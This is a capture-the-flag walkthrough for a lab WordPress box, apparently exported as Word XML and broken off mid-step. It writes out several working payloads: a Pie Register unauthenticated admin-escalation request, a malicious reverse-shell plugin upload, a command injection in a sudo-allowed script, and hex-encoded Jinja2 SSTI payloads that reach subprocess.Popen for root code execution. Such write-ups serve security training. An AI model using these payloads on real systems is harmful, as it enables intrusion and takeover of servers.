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REGISTER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a1mvvne36yl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6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that only one web port was open: port 80.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observe, the application did not load the CSS correctly. This happens because we have not yet added the domain to our hosts file. We can obtain the domain name by inspecting the page.</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03600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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3403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5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associating the IP address with the domain name, we observe that the CSS loads correctly, confirming that the content management system in use is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress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7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hrzj8432v0s8" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan</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WPScan is a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> BlackBox </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">testing tool designed to scan WordPress installations and their plugins for possible vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/wpscanteam/wpscan</w:t>
        </w:r>
      </w:hyperlink>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41700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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34417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7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tool’s analysis, I observed that the CMS is using the plugin </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“pie-register”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, after attempting to exploit some identified vulnerabilities, I was unsuccessful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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conducting further research online, we found another vulnerability related to this plugin: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin Privilege Escalation (Unauthenticated).</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WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated). Webapps exploit for PHP platform</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hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50395</w:t>
        </w:r>
      </w:hyperlink>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the link above, we can essentially send the following request:</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-q -S -O - http://register.hc/ --post-data \</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'user_id_social_site=1&amp;social_site=true&amp;piereg_login_after_registration=true&amp;_wp_http_referer=/login/&amp;log=null&amp;pwd=null' \</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/dev/null</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obtain the admin user’s cookie, thereby authenticating ourselves as the admin user in the CMS.</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4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acquiring the admin user’s cookie, we can manually configure it in our browser.</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5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setting the cookie, we are authenticated as an administrator in the CMS.</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administrative access, we can create a malicious plugin that will include our reverse shell payload:</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WordPress Plugin: Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell</w:t>
        </w:r>
      </w:hyperlink>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plugin created, we can go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plugins → Add New</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upload it.</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5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6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clicking on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“Activate Plugin”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we receive the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">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no3hibxx7b" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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39yn2vh37ty" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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714500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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9yy4wmrio8o" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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4orpyval94dk" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.s8yc9f6jox1x" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading a simple shell to fully interactive TTYs:</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export TERM=xterm</w:t>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6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a shell on the server, the goal is to retrieve the user flag. However, when examining the home directory, we notice that we cannot access the home of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“bob”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where the flag is stored.</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we need to perform lateral privilege escalation to gain access to that user.</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analyzing the output of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified that it is possible to execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python2.7 /opt/aulas/ex09.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with the privileges of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“bob”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, without needing to provide his password.</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Upon carefully analyzing the contents of the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ex09.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the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directory, we identified a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability. This occurs because user input is passed as an argument to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo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without any sanitization, and this command is executed within the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7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20447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7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we successfully exploit the command injection vulnerability.</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7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obtain a shell as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“bob”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. To achieve this, we insert a reverse shell payload:</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6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bob’s home directory, we are able to retrieve the first flag.</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6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the final flag. For this, we must escalate to the root user.</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bob’s home directory, there is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask project</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> belonging to the root user. When analyzing the code, we identified a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Template Injection (SSTI)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, since the application uses </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">render_template</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we control the variable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However, there is a blacklist that we need to bypass.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -nlapt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we observe that the application is running locally on port 5000.</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6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5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the referenced article, we can bypass these restrictions using hexadecimal representation.</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Jinja2 SSTI filter bypasses</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f</w:t>
        </w:r>
      </w:hyperlink>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send a request using curl with the following payload to obtain the subclasses:</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127.0.0.1:5000/apiregister_v2 --data "username=</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{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()}}"</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examining the returned HTML, we observe the list of subclasses.</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4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inserting the subclasses into Visual Studio Code, we perform a more detailed analysis and identify the position of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.Popen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going back a few positions, specifically to position </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">202</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we locate the occurrence of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">subprocess.Popen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127.0.0.1:5000/apiregister_v2 --data "username=</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{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')</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()|attr('\x5f\x5fgetitem\x5f\x5f')(202)}}"</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50"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exact position of</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subprocess.Popen</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we now have remote code execution capability. We can observe that we receive the output of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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command:</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127.0.0.1:5000/apiregister_v2 --data "username=</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{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')</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()|attr('\x5f\x5fgetitem\x5f\x5f')(202)('id',shell=True,stdout=-1)|attr('communicate')()</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|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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attempting to read the root flag, we encounter the message </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“character not allowed”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to the space in the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /root/root.txt</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6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To bypass this issue, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
